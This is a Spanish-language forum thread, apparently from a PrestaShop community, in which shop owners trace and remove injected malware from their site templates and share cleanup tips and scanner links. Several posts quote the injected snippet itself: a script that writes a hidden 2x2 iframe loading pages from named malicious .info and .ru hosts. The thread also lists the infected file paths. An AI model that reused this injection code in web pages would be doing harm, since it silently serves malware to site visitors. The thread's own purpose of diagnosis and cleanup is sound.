oki pues esperamos a ver donde indicas que estan, dices que desintalaste el modulo de twitter, tienes el modulo pie de pagina buhoc? yo es el que tengo que lleva el tema de twitter.

Share this post


Link to post
Share on other sites

Pues, en los casos que he visto, no es cosa de prestashop (hablo del malware) si no del servidor. Eso sí, si el problema que tenéis es el virus de Prestashop, eso sí es cosa del presta.

  • Like 1

Share this post


Link to post
Share on other sites

un poco de paciencia despues de 16h eliminando todo de todas las carpetas una por una no me a salido mas estoy instalando otra vez el modulo de twitter aver que pasa esperare hasta mañana.

consejo personal no hay otra manera que eliminar de todas las carpetas de los archivos php y tpl revisalas una por una

( si eliminais todo y dejais por descuido una el cualquier carpeta saldra otra vez )

un saludo

Edited by elitemfitness (see edit history)
  • Like 1

Share this post


Link to post
Share on other sites

oki pues esperamos a ver donde indicas que estan, dices que desintalaste el modulo de twitter, tienes el modulo pie de pagina buhoc? yo es el que tengo que lleva el tema de twitter.

 

no tengo ese modulo tengo otro de twitter

teneis que hacer pruevas este codigo entra por algun lado

Edited by elitemfitness (see edit history)
  • Like 1

Share this post


Link to post
Share on other sites

Bueno os paso donde yo e encontrado este código pido por favor a toda la comunidad que si lo localizamos en otras carpetas lo publiquéis

 

codigo a localizar en mi caso

 

<!--c3284d--> <script type="text/javascript">

document.write('<iframe src="http://torvaldscallthat.info/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

</script><!--/c3284d-->

 

se encuentra en

 

public/.htaccess

 

themes/debug.tpl/index.php

 

en mi caso dentro de mi theme/footer.tpl/header.tpl/index.tpl

 

prestashop/footer.tpl/header.tpl/index.tpl

 

tools/index.php/smarty/debug.tpl/index.php/Smarty.class.php

 

No se te olvide forzar compilación, después de realizar el cambio.

 

Limpiar el historial reciente de tu navegador

 

creo que no me dejo ninguno

 

comentaros que al principio solo eliminaba de algunas carpetas y al rato de 3,4,5h estaba hay otra vez

 

me canse y revise carpeta por carpeta lo elimine todo y se acabo por el momento

 

un gran aporte por el compañero jordiob revisa tu web http://sitecheck.sucuri.net/scanner/

Edited by elitemfitness (see edit history)
  • Like 1

Share this post


Link to post
Share on other sites

lo e leido elite, entiendo con tu mensaje que aunque tu lo tengas en esos archivos pueden haver en mas sitios el codigo, por ellos pregunto si son todas las carpetas, porque me voy a poner a buscar y por ejemplo la carpeta de admin, seguramente no haga falta mirarla, aunque tampoco lo se...xD

Share this post


Link to post
Share on other sites

lirelok verifica carpeta por carpeta es mi consejo

bueno instale el modulo de twitter y a las 3 horas mas o menos se introdujo en pt bicho otra vez e disistalado el modulo twitter sigo en pruevas las colgare cuando las tenga ( si no conseguimos saver por donde entra sera imposible desacerse es esto)

un saludo

 

nadie te e pasado un privado necesitamos ayuda de profesionales de prestashop un saludo

Edited by elitemfitness (see edit history)

Share this post


Link to post
Share on other sites

Como lo llevais?

 

Yo de momento e localidazo codigo en todos estos archivos y todavia me queda un monton por mirar......

 

themes/debug.tpl/index.php

dentro de la carpeta theme/footer.tpl/header.tpl/index.tpl/index.php/restricted-country.tpl/maintenance.tpl

prestashop/footer.tpl/header.tpl/index.tpl/index.php/restricted-country.tpl/maintenance.tpl

tools/index.php/smarty/debug.tpl/index.php/Smarty.class.php

 

no hay algun soft para que busque el mismo codigo malware/malicioso? esto es una locura....

Share this post


Link to post
Share on other sites

Puede seguir los pasos que ponía aquí: http://jordiob.com/2012/07/como-resolver-los-ataques-de-malware-yo-virus-a-prestashop/ uno de ellos es instalar dreamweaver o eclipse y hacer un "nuevo sitio" que indexe todos los archivos de vuestro site. Dreamweaver tiene una función de buscar/reemplazar. Tenéis también otros editores como el Coda para Mac, el HTML Tidy, el Edit Plus... para gustos, colores :)

Share this post


Link to post
Share on other sites

Puede seguir los pasos que ponía aquí: http://jordiob.com/2...s-a-prestashop/ uno de ellos es instalar dreamweaver o eclipse y hacer un "nuevo sitio" que indexe todos los archivos de vuestro site. Dreamweaver tiene una función de buscar/reemplazar. Tenéis también otros editores como el Coda para Mac, el HTML Tidy, el Edit Plus... para gustos, colores :)

 

jordiob, mirando la piagina esta que enlazas que veo que es tuya, te pasa lo mismo que a mi!!

 

mira este enlace: http://www.prestasho...miento-erroneo/

 

No se si te has fijado, pero al abrir tu pagina mediante un dispositivo mobil aparece en la parte superior una barra buscador de BING, por fin veo a alguien que le pasa....ya creia que alguien me habia metio algun modulo que no veia...

 

Mirando tu script de la pagina veo que todavia tienes este codigo que es el que produce eso:

 

<iframe width="2" scrolling="auto" align="middle" height="2" frameborder="no" name="Twitter" src="http://greenpillar.ru/in.cgi?16">

 

En mi caso es este:

 

<iframe src="http://whitecada.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>

 

haber si entre todos conseguimos acabar con el!!!

 

Sobre lo que dice elitemfitness, supongo que puedes eliminar y instalar la web de nuevo, pero quien te dice que no nos va a pasar otra vez...

Edited by lirelok (see edit history)

Share this post


Link to post
Share on other sites

jordiob, mirando la piagina esta que enlazas que veo que es tuya, te pasa lo mismo que a mi!!

 

mira este enlace: http://www.prestasho...miento-erroneo/

 

No se si te has fijado, pero al abrir tu pagina mediante un dispositivo mobil aparece en la parte superior una barra buscador de BING, por fin veo a alguien que le pasa....ya creia que alguien me habia metio algun modulo que no veia...

 

Tienes razón, acabo de verlo, me metieron una inyección en el header (esto es wordpress, no prestashop). Resuelto, gracias!

Share this post


Link to post
Share on other sites

uff pues no sabes que alegria me dio de verlo y darme cuenta que era el virus, porque ya estaba por desinstalar todos los modulos....xDDD

 

Segui tu ayuda en la forma de buscar el codigo malicioso mediante dreamweaver, buscando archivos en el sitio local y es un lujazo!! y yo mirando archivo por archivo.....jajaja ahora e eliminado todo el codigo y la web esta totalmente limpia aunque en la paginahttp://sitecheck.sucuri.net/scanner/ todavia siguen saliendo los mismos problemas, supongo que tardan unos dias en limpiar su cache.

 

Pobre este otro sistema gratuito: http://safeweb.norton.com/ debes registrarte y realizar unos procesos para la autentificacion como propietario de la web, luego solicitas una revision de tu pagina y un plazo de 2, 3 dias te reportan un informe, el mio se realizo cuando la web ya estaba limpia: http://safeweb.norton.com/report/show?url=centralseeds.com

 

Asi que toca esperar y ver si el bichito vuelve a entrar.

Share this post


Link to post
Share on other sites